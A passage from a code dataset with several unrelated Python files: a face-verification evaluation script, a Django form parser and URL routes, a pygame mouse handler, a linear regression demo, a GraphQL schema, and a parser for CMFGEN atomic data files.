np.zeros(nrof_folds)\n\n indices = np.arange(nrof_pairs)\n\n for fold_idx, (train_set, test_set) in enumerate(k_fold.split(indices)):\n if subtract_mean:\n mean = np.mean(np.concatenate(\n [embeddings1[train_set], embeddings2[train_set]]), axis=0)\n else:\n mean = 0.0\n dist = distance(embeddings1-mean, embeddings2-mean, distance_metric)\n\n # Find the threshold that gives FAR = far_target\n far_train = np.zeros(nrof_thresholds)\n for threshold_idx, threshold in enumerate(thresholds):\n _, far_train[threshold_idx] = calculate_val_far(\n threshold, dist[train_set], actual_issame[train_set])\n if np.max(far_train) >= far_target:\n f = interpolate.interp1d(far_train, thresholds, kind='slinear')\n threshold = f(far_target)\n else:\n threshold = 0.0\n\n val[fold_idx], far[fold_idx] = calculate_val_far(\n threshold, 
dist[test_set], actual_issame[test_set])\n\n val_mean = np.mean(val)\n far_mean = np.mean(far)\n val_std = np.std(val)\n return val_mean, val_std, far_mean\n\n\ndef calculate_roc(thresholds, embeddings1, embeddings2, actual_issame, nrof_folds=10, distance_metric=0, subtract_mean=False):\n assert(embeddings1.shape[0] == embeddings2.shape[0])\n assert(embeddings1.shape[1] == embeddings2.shape[1])\n nrof_pairs = min(len(actual_issame), embeddings1.shape[0])\n nrof_thresholds = len(thresholds)\n k_fold = KFold(n_splits=nrof_folds, shuffle=False)\n\n tprs = np.zeros((nrof_folds, nrof_thresholds))\n fprs = np.zeros((nrof_folds, nrof_thresholds))\n accuracy = np.zeros((nrof_folds))\n\n indices = np.arange(nrof_pairs)\n\n for fold_idx, (train_set, test_set) in enumerate(k_fold.split(indices)):\n if subtract_mean:\n mean = np.mean(np.concatenate(\n [embeddings1[train_set], embeddings2[train_set]]), axis=0)\n else:\n mean = 0.0\n dist = distance(embeddings1-mean, embeddings2-mean, distance_metric)\n\n # Find the best threshold for the fold\n acc_train = np.zeros((nrof_thresholds))\n for threshold_idx, threshold in enumerate(thresholds):\n _, _, acc_train[threshold_idx] = calculate_accuracy(\n threshold, dist[train_set], actual_issame[train_set])\n best_threshold_index = np.argmax(acc_train)\n for threshold_idx, threshold in enumerate(thresholds):\n tprs[fold_idx, threshold_idx], fprs[fold_idx, threshold_idx], _ = calculate_accuracy(\n threshold, dist[test_set], actual_issame[test_set])\n _, _, accuracy[fold_idx] = calculate_accuracy(\n thresholds[best_threshold_index], dist[test_set], actual_issame[test_set])\n\n tpr = np.mean(tprs, 0)\n fpr = np.mean(fprs, 0)\n print(\"best_threshold:\", thresholds[best_threshold_index], flush=True)\n return tpr, fpr, accuracy\n\n\ndef lfw_evaluate(embeddings, actual_issame, nrof_folds=10, distance_metric=0, subtract_mean=False):\n # Calculate evaluation metrics\n thresholds = np.arange(0, 4, 0.01)\n embeddings1 = embeddings[0::2]\n embeddings2 = embeddings[1::2]\n tpr, fpr, accuracy = calculate_roc(thresholds, embeddings1, embeddings2,\n np.asarray(actual_issame), nrof_folds=nrof_folds, distance_metric=distance_metric, subtract_mean=subtract_mean)\n thresholds = np.arange(0, 4, 0.001)\n val, val_std, far = calculate_val(thresholds, embeddings1, embeddings2,\n np.asarray(actual_issame), 1e-3, nrof_folds=nrof_folds, distance_metric=distance_metric, subtract_mean=subtract_mean)\n return tpr, fpr, accuracy, val, val_std, far\n\n\ndef merge_eval(model_name_list):\n print('start merge eval!', flush=True)\n args = p_args()\n\n model_list = []\n for model_name in model_name_list:\n model = LightCNN_29Layers_v3(num_classes=8642, args=args)\n pre_dict = torch.load(os.path.join(\n './save/weights', model_name), map_location='cpu')['state_dict']\n if model_name == 'lightCNN_62_checkpoint.pth.tar':\n pre_dict = {k[7:]: v for k, v in pre_dict.items(\n ) if 'fc2' not in k and 'arc' not in k}\n else:\n pre_dict = {k: v for k, v in pre_dict.items(\n ) if 'fc2' not in k and 'arc' not in k}\n model_dict = model.state_dict()\n model_dict.update(pre_dict)\n model.load_state_dict(model_dict)\n\n if args.cuda:\n model = model.cuda()\n\n model_list.append(model)\n\n trans = transforms.Compose([\n transforms.Grayscale(),\n # transforms.Normalize((127.5, ), (128, )),\n transforms.ToTensor()\n ])\n\n paths, actual_issame = get_paths('./save/csv2/noise_pair.csv')\n embeddings = []\n for path in paths:\n img = Image.open(path)\n img = trans(img)\n if args.cuda:\n img = img.cuda()\n fc = 
np.mean(np.concatenate([model(img.unsqueeze(0))[\n 1].detach().cpu().numpy() for model in model_list], 0), axis=0, keepdims=True)\n embeddings.append(fc)\n embeddings = np.concatenate(embeddings, 0)\n tpr, fpr, accuracy, val, val_std, far = lfw_evaluate(\n embeddings, actual_issame, nrof_folds=10, distance_metric=1, subtract_mean=False)\n print('Accuracy: %2.5f+-%2.5f' %\n (np.mean(accuracy), np.std(accuracy)), flush=True)\n print('Validation rate: %2.5f+-%2.5f @ FAR=%2.5f' %\n (val, val_std, far), flush=True)\n\n auc = metrics.auc(fpr, tpr)\n print('Area Under Curve (AUC): %1.3f' % auc, flush=True)\n eer = brentq(lambda x: 1. - x - interpolate.interp1d(fpr, tpr)(x), 0., 1.)\n print('Equal Error Rate (EER): %1.3f' % eer, flush=True)\n\n\ndef single_eval():\n print('start single eval!', flush=True)\n args = p_args()\n model = LightCNN_29Layers_v3(num_classes=8642, args=args)\n pre_dict = torch.load(os.path.join(\n './save/weights', 'lightCNN_62_checkpoint.pth.tar'), map_location='cpu')['state_dict']\n pre_dict = {k[7:]: v for k, v in pre_dict.items(\n ) if 'fc2' not in k and 'arc' not in k}\n # pre_dict = torch.load(os.path.join(\n # './save/weights', '605.pth.tar'), map_location='cpu')['state_dict']\n # pre_dict = {k: v for k, v in pre_dict.items(\n # ) if 'fc2' not in k and 'arc' not in k}\n model_dict = model.state_dict()\n model_dict.update(pre_dict)\n model.load_state_dict(model_dict)\n\n if args.cuda:\n model = model.cuda()\n\n trans = transforms.Compose([\n transforms.Grayscale(),\n # transforms.Normalize((127.5, ), (128, )),\n # transforms.Resize((112, 112)),\n transforms.ToTensor()\n ])\n\n paths, actual_issame = get_paths('./save/csv2/ca_lfw.csv')\n embeddings = []\n for path in paths:\n img = Image.open(path)\n img = trans(img)\n if args.cuda:\n img = img.cuda()\n _, fc = model(img.unsqueeze(0))\n # norm?\n # fc = l2_norm(fc)\n embeddings.append(fc.detach().cpu().numpy())\n embeddings = np.concatenate(embeddings, 0)\n\n tpr, fpr, accuracy, val, val_std, far = lfw_evaluate(\n embeddings, actual_issame, nrof_folds=10, distance_metric=1, subtract_mean=False)\n print('Accuracy: %2.5f+-%2.5f' %\n (np.mean(accuracy), np.std(accuracy)), flush=True)\n print('Validation rate: %2.5f+-%2.5f @ FAR=%2.5f' %\n (val, val_std, far), flush=True)\n\n auc = metrics.auc(fpr, tpr)\n print('Area Under Curve (AUC): %1.3f' % auc, flush=True)\n eer = brentq(lambda x: 1. 
- x - interpolate.interp1d(fpr, tpr)(x), 0., 1.)\n print('Equal Error Rate (EER): %1.3f' % eer, flush=True)\n\n\nif __name__ == '__main__':\n single_eval()\n # merge_eval(['506.pth.tar','605.pth.tar','701.pth.tar','800.pth.tar'])\n # merge_eval(['506.pth.tar', 'lightCNN_62_checkpoint.pth.tar'])", "sub_path": "train/star_eval.py", "file_name": "star_eval.py", "file_ext": "py", "file_size_in_byte": 12908, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 28, "usage_type": "call"}, {"api_name": "argparse.ArgumentDefaultsHelpFormatter", "line_number": 29, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 60, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 64, "usage_type": "call"}, {"api_name": "os.path", "line_number": 64, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 66, "usage_type": "call"}, {"api_name": "os.path", "line_number": 66, "usage_type": "attribute"}, {"api_name": "pandas.read_csv", "line_number": 73, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 87, "usage_type": "call"}, {"api_name": "os.path", "line_number": 87, "usage_type": "attribute"}, {"api_name": "numpy.subtract", "line_number": 101, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 102, "usage_type": "call"}, {"api_name": "numpy.square", "line_number": 102, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 105, "usage_type": "call"}, {"api_name": "numpy.multiply", "line_number": 105, "usage_type": "call"}, {"api_name": "numpy.linalg.norm", "line_number": 106, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 106, "usage_type": "attribute"}, {"api_name": "numpy.linalg.norm", "line_number": 107, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 107, "usage_type": "attribute"}, {"api_name": "numpy.arccos", "line_number": 109, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 109, "usage_type": "attribute"}, {"api_name": "numpy.less", "line_number": 117, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 118, "usage_type": "call"}, {"api_name": "numpy.logical_and", "line_number": 118, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 119, "usage_type": "call"}, {"api_name": "numpy.logical_and", "line_number": 119, "usage_type": "call"}, {"api_name": "numpy.logical_not", "line_number": 119, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 120, "usage_type": "call"}, {"api_name": "numpy.logical_and", "line_number": 120, "usage_type": "call"}, {"api_name": "numpy.logical_not", "line_number": 120, "usage_type": "call"}, {"api_name": "numpy.logical_not", "line_number": 121, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 122, "usage_type": "call"}, {"api_name": "numpy.logical_and", "line_number": 122, "usage_type": "call"}, {"api_name": "numpy.logical_not", "line_number": 122, "usage_type": "call"}, {"api_name": "numpy.less", "line_number": 131, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 132, "usage_type": "call"}, {"api_name": "numpy.logical_and", "line_number": 132, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 133, "usage_type": "call"}, {"api_name": "numpy.logical_and", "line_number": 133, "usage_type": "call"}, {"api_name": "numpy.logical_not", "line_number": 134, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 135, "usage_type": 
"call"}, {"api_name": "numpy.sum", "line_number": 136, "usage_type": "call"}, {"api_name": "numpy.logical_not", "line_number": 136, "usage_type": "call"}, {"api_name": "sklearn.model_selection.KFold", "line_number": 147, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 149, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 150, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 152, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 156, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 156, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 163, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 167, "usage_type": "call"}, {"api_name": "scipy.interpolate.interp1d", "line_number": 168, "usage_type": "call"}, {"api_name": "scipy.interpolate", "line_number": 168, "usage_type": "name"}, {"api_name": "numpy.mean", "line_number": 176, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 177, "usage_type": "call"}, {"api_name": "numpy.std", "line_number": 178, "usage_type": "call"}, {"api_name": "sklearn.model_selection.KFold", "line_number": 187, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 189, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 190, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 191, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 193, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 197, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 197, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 204, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 208, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 215, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 216, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 223, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 227, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 228, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 230, "usage_type": "call"}, {"api_name": "model.LightCNN_29Layers_v3", "line_number": 240, "usage_type": "call"}, {"api_name": "torch.load", "line_number": 241, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 241, "usage_type": "call"}, {"api_name": "os.path", "line_number": 241, "usage_type": "attribute"}, {"api_name": "model.state_dict", "line_number": 249, "usage_type": "call"}, {"api_name": "model.load_state_dict", "line_number": 251, "usage_type": "call"}, {"api_name": "model.cuda", "line_number": 254, "usage_type": "call"}, {"api_name": "torchvision.transforms.Compose", "line_number": 258, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 258, "usage_type": "name"}, {"api_name": "torchvision.transforms.Grayscale", "line_number": 259, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 259, "usage_type": "name"}, {"api_name": "torchvision.transforms.ToTensor", "line_number": 261, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 261, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 267, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 267, "usage_type": "name"}, {"api_name": "numpy.mean", "line_number": 271, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 271, "usage_type": "call"}, 
{"api_name": "numpy.concatenate", "line_number": 274, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 278, "usage_type": "call"}, {"api_name": "numpy.std", "line_number": 278, "usage_type": "call"}, {"api_name": "sklearn.metrics.auc", "line_number": 282, "usage_type": "call"}, {"api_name": "sklearn.metrics", "line_number": 282, "usage_type": "name"}, {"api_name": "scipy.optimize.brentq", "line_number": 284, "usage_type": "call"}, {"api_name": "scipy.interpolate.interp1d", "line_number": 284, "usage_type": "call"}, {"api_name": "scipy.interpolate", "line_number": 284, "usage_type": "name"}, {"api_name": "model.LightCNN_29Layers_v3", "line_number": 291, "usage_type": "call"}, {"api_name": "torch.load", "line_number": 292, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 292, "usage_type": "call"}, {"api_name": "os.path", "line_number": 292, "usage_type": "attribute"}, {"api_name": "model.state_dict", "line_number": 300, "usage_type": "call"}, {"api_name": "model.load_state_dict", "line_number": 302, "usage_type": "call"}, {"api_name": "model.cuda", "line_number": 305, "usage_type": "call"}, {"api_name": "torchvision.transforms.Compose", "line_number": 307, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 307, "usage_type": "name"}, {"api_name": "torchvision.transforms.Grayscale", "line_number": 308, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 308, "usage_type": "name"}, {"api_name": "torchvision.transforms.ToTensor", "line_number": 311, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 311, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 317, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 317, "usage_type": "name"}, {"api_name": "numpy.concatenate", "line_number": 325, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 330, "usage_type": "call"}, {"api_name": "numpy.std", "line_number": 330, "usage_type": "call"}, {"api_name": "sklearn.metrics.auc", "line_number": 334, "usage_type": "call"}, {"api_name": "sklearn.metrics", "line_number": 334, "usage_type": "name"}, {"api_name": "scipy.optimize.brentq", "line_number": 336, "usage_type": "call"}, {"api_name": "scipy.interpolate.interp1d", "line_number": 336, "usage_type": "call"}, {"api_name": "scipy.interpolate", "line_number": 336, "usage_type": "name"}]} +{"seq_id": "224422914", "text": "# References from\n# https://stackoverflow.com/questions/25291466/django-rest-framework-file-upload-with-nested-writable-serializers\nfrom django.http import QueryDict\nfrom formencode.variabledecode import variable_decode\nfrom rest_framework import parsers\n\n\nclass MultipartFormencodeParser(parsers.MultiPartParser):\n def parse(self, stream, media_type=None, parser_context=None):\n result = super().parse(\n stream,\n media_type=media_type,\n parser_context=parser_context\n )\n data = variable_decode(result.data)\n\n qdict = QueryDict('', mutable=True)\n qdict.update(data)\n data_and_files = parsers.DataAndFiles(qdict, result.files)\n return data_and_files", "sub_path": "webserver/apps/commons/parser.py", "file_name": "parser.py", "file_ext": "py", "file_size_in_byte": 735, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "rest_framework.parsers.MultiPartParser", "line_number": 8, "usage_type": "attribute"}, {"api_name": "rest_framework.parsers", "line_number": 8, "usage_type": "name"}, {"api_name": 
"formencode.variabledecode.variable_decode", "line_number": 15, "usage_type": "call"}, {"api_name": "django.http.QueryDict", "line_number": 17, "usage_type": "call"}, {"api_name": "rest_framework.parsers.DataAndFiles", "line_number": 19, "usage_type": "call"}, {"api_name": "rest_framework.parsers", "line_number": 19, "usage_type": "name"}]} +{"seq_id": "399878666", "text": "import pygame\nfrom OpenGL.GL import *\nfrom OpenGL.GLU import *\nfrom pygame.locals import *\nimport eventmanager\n\nBUTTON_PRESSED = 0\nBUTTON_HOLD = 1\nBUTTON_RELEASED = 2\nBUTTON_INACTIVE = 3\n\nclass maus(object):\n def __init__(self):\n self.pressed = [False,False,False]\n self.hold = [False,False,False]\n self.release = [False, False, False]\n self.inactive = [True,True,True]\n\n self.pos = (0,0)\n \n def update(self):\n pressed = pygame.mouse.get_pressed()\n self.pos = pygame.mouse.get_pos()\n for i in range(3):\n\n if self.pressed[i]:\n self.pressed[i] = False\n self.hold[i] = True\n\n if self.release[i]:\n self.release[i] = False\n self.inactive[i] = True\n\n if pressed[i]:\n if self.inactive[i]:\n self.inactive[i] = False\n self.pressed[i] = True\n else:\n if self.hold[i]:\n self.hold[i] = False\n self.release[i] = True\n\n\n\n\n def getState(self,button):\n if self.pressed[button]:\n \n return BUTTON_PRESSED\n elif self.release[button]:\n \n return BUTTON_RELEASED\n\n elif self.hold[button]:\n return BUTTON_HOLD\n\n return BUTTON_INACTIVE\n\n def getPos(self):\n return self.pos\n ", "sub_path": "simongame/maus.py", "file_name": "maus.py", "file_ext": "py", "file_size_in_byte": 1423, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "pygame.mouse.get_pressed", "line_number": 22, "usage_type": "call"}, {"api_name": "pygame.mouse", "line_number": 22, "usage_type": "attribute"}, {"api_name": "pygame.mouse.get_pos", "line_number": 23, "usage_type": "call"}, {"api_name": "pygame.mouse", "line_number": 23, "usage_type": "attribute"}]} +{"seq_id": "85094619", "text": "from django.urls import path\n\nfrom . 
import views\n\nurlpatterns = [\n path('is_logged_in', views.is_logged_in, name='is_logged_in'),\n path('register', views.save_user_token, name='register'),\n path('get_pages', views.get_pages, name='get_pages'),\n path('update_page', views.update_page_info, name='update_page'),\n path('revoke', views.revoke_all_permissions, name='revoke'),\n]\n", "sub_path": "FacebookManager/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 390, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "django.urls.path", "line_number": 6, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 7, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 8, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 9, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 10, "usage_type": "call"}]} +{"seq_id": "367531733", "text": "import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport os\n\nos.chdir(r'g:\\\\Programs\\\\python\\\\Machine Learning\\\\Linear Regression')\n\ndatas = pd.read_csv('example.csv')\nprint(datas.shape)\ndatas.head()\n\nX = datas[datas.columns[0]].values\nY = datas[datas.columns[1]].values\nprint(X)\nprint(Y)\n\nmean_x = np.mean(X)\nmean_y = np.mean(Y)\n\nn = len(X)\n\n## SEARCH FOR M & (C)OEF\nm_atas = 0\nm_bawah = 0\nfor i in range(n):\n m_atas += (X[i] - mean_x) * (Y[i] - mean_y)\n m_bawah += (X[i] - mean_x)**2\n\n# mean_y = m * mean_x + c\nm = m_atas / m_bawah\nc = mean_y - (m * mean_x)\nprint(\"{} = {} * {} + {}\".format(mean_y, m, mean_x, c))\nprint(mean_y)\npredicted_y = []\n\nfor i in range (len(X)):\n y = m * X[i] + c\n predicted_y.append(y) # h_theta_xi\n\nss_t = 0\nss_r = 0\n\nfor i in range (n):\n y_predic = m * X[i] + c\n ss_t += (Y[i] - mean_y) ** 2\n ss_r += (Y[i] - predicted_y[i]) ** 2\nError = ss_r / ss_t\nr2 = 1 - Error\nprint(r2)\n\n# plt.axis([0, 100, 0, 100])\nplt.plot(X, Y, \"o\")\nplt.plot(X, predicted_y)\nplt.show()\n", "sub_path": "Linear Regression/linear_reg.py", "file_name": "linear_reg.py", "file_ext": "py", "file_size_in_byte": 1034, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "os.chdir", "line_number": 6, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 8, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 17, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 18, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 52, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 52, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 53, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 53, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 54, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 54, "usage_type": "name"}]} +{"seq_id": "322720845", "text": "import graphene\n\nfrom graphene_django.types import DjangoObjectType\nfrom graphene_django.filter import DjangoFilterConnectionField\n\nfrom products import models\n\n\nclass ProductType(DjangoObjectType):\n class Meta:\n model = models.Product\n filter_fields = {\n 'title': ['exact', 'icontains'],\n 'description': ['exact', 'icontains'],\n }\n interfaces = (graphene.relay.Node,)\n\n\nclass CategoryType(DjangoObjectType):\n class Meta:\n model = models.Category\n filter_fields = 
{\n 'title': ['exact', 'icontains'],\n }\n interfaces = (graphene.relay.Node,)\n\n\nclass Query(graphene.AbstractType):\n products = DjangoFilterConnectionField(ProductType)\n category = DjangoFilterConnectionField(CategoryType)\n\n def resolve_products(self, info, **kwargs):\n return models.Product.objects.all()\n\n def resolve_category(self, info, **kwargs):\n return models.Category.objects.all()\n\nclass CreateCategory(graphene.Mutation):\n class Arguments:\n title = graphene.String()\n\n ok = graphene.Boolean()\n\n def mutate(self, info, title):\n models.Category(title=title).save()\n return CreateCategory(ok=True)", "sub_path": "products/schema.py", "file_name": "schema.py", "file_ext": "py", "file_size_in_byte": 1217, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "graphene_django.types.DjangoObjectType", "line_number": 9, "usage_type": "name"}, {"api_name": "products.models.Product", "line_number": 11, "usage_type": "attribute"}, {"api_name": "products.models", "line_number": 11, "usage_type": "name"}, {"api_name": "graphene.relay", "line_number": 16, "usage_type": "attribute"}, {"api_name": "graphene_django.types.DjangoObjectType", "line_number": 19, "usage_type": "name"}, {"api_name": "products.models.Category", "line_number": 21, "usage_type": "attribute"}, {"api_name": "products.models", "line_number": 21, "usage_type": "name"}, {"api_name": "graphene.relay", "line_number": 25, "usage_type": "attribute"}, {"api_name": "graphene.AbstractType", "line_number": 28, "usage_type": "attribute"}, {"api_name": "graphene_django.filter.DjangoFilterConnectionField", "line_number": 29, "usage_type": "call"}, {"api_name": "graphene_django.filter.DjangoFilterConnectionField", "line_number": 30, "usage_type": "call"}, {"api_name": "products.models.Product.objects.all", "line_number": 33, "usage_type": "call"}, {"api_name": "products.models.Product", "line_number": 33, "usage_type": "attribute"}, {"api_name": "products.models", "line_number": 33, "usage_type": "name"}, {"api_name": "products.models.Category.objects.all", "line_number": 36, "usage_type": "call"}, {"api_name": "products.models.Category", "line_number": 36, "usage_type": "attribute"}, {"api_name": "products.models", "line_number": 36, "usage_type": "name"}, {"api_name": "graphene.Mutation", "line_number": 38, "usage_type": "attribute"}, {"api_name": "graphene.String", "line_number": 40, "usage_type": "call"}, {"api_name": "graphene.Boolean", "line_number": 42, "usage_type": "call"}, {"api_name": "products.models.Category", "line_number": 45, "usage_type": "call"}, {"api_name": "products.models", "line_number": 45, "usage_type": "name"}]}
+{"seq_id": "461568786", "text": "\nimport requests \nimport os \nfrom tqdm import tqdm\nimport re\nimport tarfile\nfrom pprint import pprint\nimport pandas as pd\nimport numpy as np\n\n\nworking_directory=os.getcwd()\n\n\n#pass header as True to get header information\n#pass download as False to disable download\ndef download_database(download=True,header=False) :\n url=\"http://kookaburra.phyast.pitt.edu/hillier/cmfgen_files/atomic_data_15nov16.tar.gz\"\n h = requests.head(url, allow_redirects=True)\n headers = h.headers\n filelength=int(headers[\"Content-Length\"])\n\n if header :\n \n print(\"Content Type : \",headers[\"content-type\"])\n print(\"Last Modified :\",headers[\"Last-Modified\"])\n print(\"Todays Date :\",headers[\"Date\"])\n print(\"File Size :\",filelength/10e5,\"MB\")\n\n\n if download : \n
filename=url.split(\"/\")[-1]\n if os.path.exists(filename) :\n return print(\"File already exists .\")\n r = requests.get(url, stream=True)\n with open(filename, 'wb') as f:\n pbar = tqdm(total=int(filelength/1024))\n for chunk in r.iter_content(chunk_size=1024):\n if chunk: # filter out keep-alive new chunks\n pbar.update ()\n f.write(chunk)\n\n\n\n\n\ndef parse_header(output,start=0,end=50) : #start and end can be changed if a header is expected to be beyond default range\n \n\n pattern=\"![A-Za-z]+.+\"\n p=re.compile(pattern)\n\n keys={}\n count=[]\n for x in range(start,min(len(output),end)) :\n temp=p.findall(output[x])\n if temp != [] :\n value=output[x].split(\" \")[0]\n keys[temp[0][1:]]=value\n count.append(x)\n \n return keys,count[0],count[-1]\n\n\nclass CMFGENEnergyLevelsParser():\n\n '''\n modelled on the base parser class , yet to be inherited \n \n attributes : \n meta = returns meta header data of the file\n load method =loads the compressed database and searches for the passed file (extraction of the file is not required )\n fname= represents the filename passed at class instantiation \n base = represents a pandas dataframe composed of the parsed data \n \n Note : \n This parser has been rewritten and the logic has been changed and the find row method has been deprecated to optimize the code \n to be executed within one pass of the file .\n \n Important Points :\n The to_hdf() function will produce the output in your current working directory .\n To specify a path where the output has to be taken pass the specific file path to the fname parameter in the function call.\n ''' \n def __init__ (self,fname) :\n\n self.load(fname)\n\n def load(self,fname) :\n base_filename=\"atomic_data_15nov16.tar.gz\"\n t = tarfile.open(base_filename,'r:gz')\n if not fname.startswith(\"a\") :\n temp=fname.find('a')\n fname=fname[temp:]\n\n\n\n file=t.extractfile(fname)\n #output will contain all of the file content line by line \n output=list(map(lambda x: x.strip().decode(\"utf-8\"),file.readlines()))\n meta,cstart,skip=parse_header(output)\n new_output=list(map(lambda x: x.split(),output))\n columns=[x for x in new_output[cstart-3] if x!=\" \"]\n \n n=int(meta['Number of energy levels'])\n \n df = pd.DataFrame(new_output[skip+2:skip+n+2],columns=columns,index=range(0,n))\n \n\n \n self.meta=meta\n self.base=df\n self.fname=fname\n self.columns=columns\n\n def to_hdf(self, key='/energy_levels',fname=working_directory):\n if not self.base.empty:\n with pd.HDFStore('{}.h5'.format(fname), 'a') as f:\n f.put(key, self.base)\n f.get_storer(key).attrs.metadata = self.meta\n\n\nclass CMFGENOscillatorStrengthsParser():\n\n\n '''\n modelled on the base parser class , yet to be inherited \n \n attributes : \n meta = returns meta header data of the file\n load method =loads the compressed database and searches for the passed file (extraction of the file is not required )\n fname= represents the filename passed at class instantiation \n base = represents a pandas dataframe composed of the parsed data \n \n Note : \n This parser has been rewritten and the logic has been changed and the find row method has been deprecated to optimize the code \n to be executed within one pass of the file .\n \n Important Points :\n The to_hdf() function will produce the output in your current working directory .\n To specify a path where the output has to be taken pass the specific file path to the fname parameter in the function call.\n '''\n def __init__ (self,fname) :\n\n self.load(fname)\n\n def load(self,fname) :\n
base_filename=\"atomic_data_15nov16.tar.gz\"\n t = tarfile.open(base_filename,'r:gz')\n if not fname.startswith(\"a\") :\n temp=fname.find('a')\n fname=fname[temp:]\n file=t.extractfile(fname)\n #output will contain all of the file content line by line \n output=list(map(lambda x: x.strip().decode(\"utf-8\"),file.readlines()))\n meta,cstart,skip=parse_header(output)\n new_output=list(map(lambda x: x.split(),output))\n columns1 = ['State A', 'State B', 'f', 'A','Lam(A)', 'i', 'j', 'Lam(obs)', '% Acc']\n columns2=['State A', 'State B', 'f', 'A','Lam(A)', 'i', 'j', 'Transition Number']\n \n \n n=int(meta['Number of energy levels'])\n m=int(meta['Number of transitions'])\n cstart=0\n\n for start in range(skip+n,skip+n+100) :\n if len(new_output[start])<1 :\n continue\n\n if new_output[start][0]==\"Transition\" :\n\n cstart=start\n break\n\n for x in new_output[cstart+2:cstart+2+m+1]:\n i=x[0].find(\"-\")\n try :\n if i !=-1 :\n x.insert(1,x[0][i+1:])\n x[0]=x[0][:i]\n \n else :\n x[1]=x[1][1:]\n \n if x[5].endswith(\"-\") :\n x[5]=x[5][:-1]\n if x[8]==\"|\" :\n x[7]=np.nan\n else :\n x[7]=x[8]\n if len(x)==9+1 :\n if x[9]== \"|\" :\n x[8]=np.nan\n else :\n x[8]=x[9]\n x.pop(9)\n elif len(x)==10 +1:\n if x[9]==\"|\" :\n x[8]=np.nan\n\n else :\n x[8]=x[9]\n x.pop(10)\n x.pop(9)\n \n elif len(x)==11+1 :\n x[7]=x[8]\n x[8]=x[10]\n x.pop(11)\n \n x.pop(10)\n x.pop(9)\n\n except IndexError : #check index error \n\n pass\n\n if len(new_output[cstart+2])==9 :\n columns=columns1\n else :\n columns=columns2\n df = 